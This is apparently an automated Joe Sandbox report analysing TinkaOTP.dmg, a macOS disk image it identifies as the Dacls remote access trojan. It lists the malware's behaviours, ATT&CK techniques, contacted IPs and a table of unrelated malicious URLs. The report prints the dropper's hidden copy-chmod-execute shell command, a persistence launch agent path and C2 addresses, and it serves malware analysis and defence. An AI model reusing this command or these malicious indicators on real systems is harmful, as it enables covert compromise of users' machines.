Analysis Report TinkaOTP.dmg

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 101851
Start date: 06.05.2020
Start time: 15:15:39
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 3m 38s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: TinkaOTP.dmg
Cookbook file name: defaultmacfilecookbook.jbs
Analysis system description: Mac Mini, Mojave (Java JDK 11.0.4, Adobe Reader 2019.012.20034, Flash 32.0.0.223)
Run name: Potential for more IOCs and behavior
Detection: MAL
Classification: mal60.troj.evad.macDMG@0/4@0/0

Detection

Strategy  | Score | Range   | Reporting      | Whitelisted | Threat | Detection
Threshold | 60    | 0 - 100 | Report FP / FN | false       | Dacls  | malicious

Classification Spiderchart

Mitre Att&ck Matrix

The matrix is listed per tactic column. A technique followed by a number is one the report's signatures matched (the number is the hit count); the remaining cells are the unmatched part of the matrix.

Initial Access: Valid Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Scripting 1; Service Execution; Windows Management Instrumentation; Scheduled Task; Command-Line Interface
Persistence: Hidden Files and Directories 2 1; Launch Daemon 1; LC_LOAD_DYLIB Addition 1; Plist Modification 1; Launch Agent 2
Privilege Escalation: Launch Daemon 1; Plist Modification 1; Path Interception; DLL Search Order Hijacking; File System Permissions Weakness
Defense Evasion: Masquerading 1; Hidden Files and Directories 2 1; Scripting 1; Plist Modification 1; Masquerading
Credential Access: Credential Dumping; Network Sniffing; Input Capture; Credentials in Files; Account Manipulation
Discovery: System Information Discovery 5 1; Application Window Discovery; Query Registry; System Network Configuration Discovery; Remote System Discovery
Lateral Movement: Application Deployment Software; Remote Services; Windows Remote Management; Logon Scripts; Shared Webroot
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Data Staged
Exfiltration: Data Compressed; Exfiltration Over Other Network Medium; Automated Exfiltration; Data Encrypted; Scheduled Transfer
Command and Control: Standard Cryptographic Protocol 1; Standard Application Layer Protocol 1; Custom Cryptographic Protocol; Multiband Communication; Standard Cryptographic Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Manipulate App Store Rankings or Ratings
Impact: Modify System Partition; Device Lockout; Delete Device Data; Premium SMS Toll Fraud

Signature Overview

Networking:

Connects to IPs without corresponding DNS lookups
Source: unknown; TCP traffic detected without corresponding DNS query: 67.43.239.146 (15 occurrences)
Source: unknown; TCP traffic detected without corresponding DNS query: 185.62.58.207 (11 occurrences)
Urls found in memory or binary data
Source: TinkaOTP.dmg; String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Uses HTTPS
Source: unknown; Network traffic detected: HTTP traffic on port 49375 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49379
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49375
Source: unknown; Network traffic detected: HTTP traffic on port 49379 -> 443

System Summary:

Classification label
Source: classification engine; Classification label: mal60.troj.evad.macDMG@0/4@0/0

Persistence and Installation Behavior:

Executes hidden files
Source: /bin/bash (PID: 18267); Hidden file executed: /Users/ben/Library/.mina /Users/ben/Library/.mina
Writes Mach-O files to untypical directories
Source: /bin/cp (PID: 18265); 64-bit Mach-O written to unusual path: /Users/ben/Library/.mina
Changes permissions of written Mach-O files
Source: /bin/cp (PID: 18265); Permissions modified for written 64-bit Mach-O /Users/ben/Library/.mina: bits: - usr: r grp: r all: rw
Creates hidden files, links and/or directories
Source: /bin/cp (PID: 18265); Hidden File created: /Users/ben/Library/.mina
Executes commands using a shell command-line interpreter
Source: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP (PID: 18263); Shell command executed: /bin/bash -c cp /Volumes/TinkaOTP/TinkaOTP.app/Contents/Resources/Base.lproj/SubMenu.nib ~/Library/.mina > /dev/null 2>&1 && chmod +x ~/Library/.mina > /dev/null 2>&1 && ~/Library/.mina > /dev/null 2>&1
Executes the "chmod" command used to modify permissions
Source: /bin/bash (PID: 18266); Chmod executable: /bin/chmod -> chmod +x /Users/ben/Library/.mina
Reads launchservices plist files
Source: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP (PID: 18263); Launchservices plist file read: /Users/ben/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Reads user launchservices plist file containing default apps for corresponding file types
Source: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP (PID: 18263); Preferences launchservices plist file read: /Users/ben/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Writes 64-bit Mach-O files to disk
Source: /bin/cp (PID: 18265); File written: /Users/ben/Library/.mina
Reads data from the local random generator
Source: /Users/ben/Library/.mina (PID: 18268); Random device file read: /dev/urandom
Uses AppleKeyboardLayouts bundle containing keyboard layouts
Source: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP (PID: 18263); AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Writes property list (.plist) files to disk
Source: /Users/ben/Library/.mina (PID: 18267); XML plist file created: /Users/ben/Library/LaunchAgents/com.aex-loop.agent.plist

Boot Survival:

Creates memory-persistent launch services
Source: /Users/ben/Library/.mina (PID: 18267); Launch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /Users/ben/Library/LaunchAgents/com.aex-loop.agent.plist
Creates user-wide 'launchd' managed services aka launch agents
Source: /Users/ben/Library/.mina (PID: 18267); Launch agent created, file created: /Users/ben/Library/LaunchAgents/com.aex-loop.agent.plist

Hooking and other Techniques for Hiding and Protection:

Creates hidden Mach-O files
Source: /bin/cp (PID: 18265); Hidden Mach-O file written: Mach-O 64 bit: /Users/ben/Library/.mina

HIPS / PFW / Operating System Protection Evasion:

Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)
Source: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP (PID: 18263); Sysctl read request: kern.safeboot (1.66)

Language, Device and Operating System Detection:

Reads hardware related sysctl values
Source: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP (PID: 18263); Sysctl read request: hw.availcpu (6.25)
Reads the system's hostname
Source: /bin/bash (PID: 18264); Sysctl requested: kern.hostname (1.10)
Reads the system or server version plist file
Source: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP (PID: 18263); System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist

Stealing of Sensitive Information:

Yara detected Dacls RAT
Source: Yara match; File source: SubMenu.nib, type: SAMPLE
Source: Yara match; File source: /Users/ben/Library/.mina, type: DROPPED

Remote Access Functionality:

Yara detected Dacls RAT
Source: Yara match; File source: SubMenu.nib, type: SAMPLE
Source: Yara match; File source: /Users/ben/Library/.mina, type: DROPPED

Malware Configuration

No configs have been found

Signature Similarity

Sample Distance (10 = nearest)

Samplename | Analysis ID | SHA256 | Similarity
(no entries)

Runtime Messages

Command: open "/Volumes/TinkaOTP/TinkaOTP.app" --args
Exit Code: 0
Exit Code Info:
Killed: False
Standard Output:
Standard Error:

Behavior Graph

Behavior Graph ID: 101851
Sample: TinkaOTP.dmg
Startdate: 06/05/2020
Architecture: MAC
Score: 60

Graph contents (recovered from the rendered graph image):
Network nodes: 185.62.58.207, port 443, local port 49379, ASN unknown, Netherlands; 67.43.239.146, port 443, local port 49375, ASN unknown, Canada
Sample-level signature: Yara detected Dacls RAT
Process tree: xpcproxy -> TinkaOTP (started) -> bash; bash -> cp (1 created file), bash -> .mina (1 created file), bash -> chmod; .mina -> .mina (started, 1 created file)
Dropped file: /Users/ben/Library/.mina, Mach-O (dropped by cp)
Process signatures: Creates hidden Mach-O files (cp); Writes Mach-O files to untypical directories (cp); Executes hidden files (.mina)

Yara Overview

Initial Sample

Source      | Rule              | Description             | Author       | Strings
SubMenu.nib | JoeSecurity_Dacls | Yara detected Dacls RAT | Joe Security |

PCAP (Network Traffic)

No yara matches

Dropped Files

Source                   | Rule              | Description             | Author       | Strings
/Users/ben/Library/.mina | JoeSecurity_Dacls | Yara detected Dacls RAT | Joe Security |

Sigma Overview

No Sigma rule has matched

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match (ASN) | Associated Sample Name / URL | Detection | Context (IP)
unknown | https://t.co/y27Kr7Z7wX | malicious | 104.244.42.133
unknown | https://linkprotect.cudasvc.com/url?a=%68%74%74%70%73%3A%2F%2F%74%2E%63%6F%2F%4E%76%38%72%49%30%32%5A%45%4F&c=E | malicious | 104.244.42.69
unknown | https://f002.backblazeb2.com/file/wyl2ruk25cvbtv9xps81of/e56dfiimp/z0etj6poadf9y2sev602k0.html?email=undefine#abosschaart@pzem.nl | malicious | 192.229.221.185
unknown | oBfsC4t10n2.xls | malicious | 52.114.77.164
unknown | https://peenni.xyz/Admin/login.php?email=nadia.abbassi@swisslife.fr&name=%20ABBASSI%20Nadia | malicious | 148.72.65.62
unknown | Documentation.xls | malicious | 185.140.53.48
unknown | Documentation.xls | malicious | 104.18.48.20
unknown | Eventbot.jar | malicious | 74.125.143.188
unknown | jazz.exe | malicious | 1.3.99.0
unknown | 📞Aeriestechnology.com Audio_4544.htm | malicious | 23.111.9.35
unknown | SWIFT.exe | malicious | 185.140.53.158
unknown | Aeriestechnology.com 📞Audio_4544.htm | malicious | 180.150.250.218
unknown | http://chng.it/nQRBfpjZD7 | malicious | 35.186.220.184
unknown | https://us8.campaign-archive.com/?u=03a536b6064301f5b9e56a1a5&id=a70d4c614e | malicious | 151.101.60.193
unknown | https://estilomagnolia.com.ar/COVID-19.html | malicious | 192.185.188.168
unknown | ace-stream-3-1-1-multi-win.exe | malicious | 138.201.84.72
unknown | http://woogle.com/ | malicious | 192.161.187.200
unknown | https://xurl.es/bz56k | malicious | 104.16.132.229
unknown | https://h8.t.hubspotemail.net/e2t/c/*W7HmM9G14pJ7vN919GD-s5dBr0/*W2_cz8f7Rk0N3W1Fc8Qv3D1Q0k0/5/f18dQhb0S9r79jx7M-W4GcZlG2wqbgQW4VSVT16bzZrwVRqVDC64DbVMW4NfVNZ9gpw4MW4PfvXg7v1hvYW7NyyjW8mv-3QW8mQCxy79mDVRV5Gp8s83GbYkW8hGL-k9bVLmzW7sLthR9djgzWW5LMnrb2c2bg7W79-X3K8gvx_4W6YmB6S7JtTqnW8mnw907bjnYCW3m1z8F8h6MtRW5mK37h1h4tZfW6s1-1C3SQgn2W3_CV247WvZcbW41TlcR3Tw-1xW3DrmCK2r5Kr4W2HT8mr6kn_xzMz74JcYSX-5W7m_B1R5c8d-SW3788pM7mNTCXW3Kh5V35QKjhhW3fFMTv8djpxyW9j8Kdg96NrfmW4FxPX82_GnqFW7c9wJr2JxmcrW4LQhN49hxfTXN5tRRv9cyhfHW3s3_hw87Z8vpW37Fssp5vfyNnW8R6rGC6cb1QjW3sBXv68yxkN1W49kJ936fMryTN11rnNb4VjkzW6Mzk0P8pPvtYV1T_l07TncnMW31GHfx12y5tcW5QHPjY7f1VhbVb5y-_27k6TlW1jVk8n2LKhTNN3Z1mnX9XfwsD7s2GRzp-nf2KWKpv03 | malicious | 13.224.197.9
unknown | https://1drv.ms/b/s!Arr0ZL_iF4eIkzIyxU6TJfnJdfLL?e=qoUvoJ | malicious | 172.217.168.66

JA3 Fingerprints

No context

Dropped Files

No context

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Screenshots
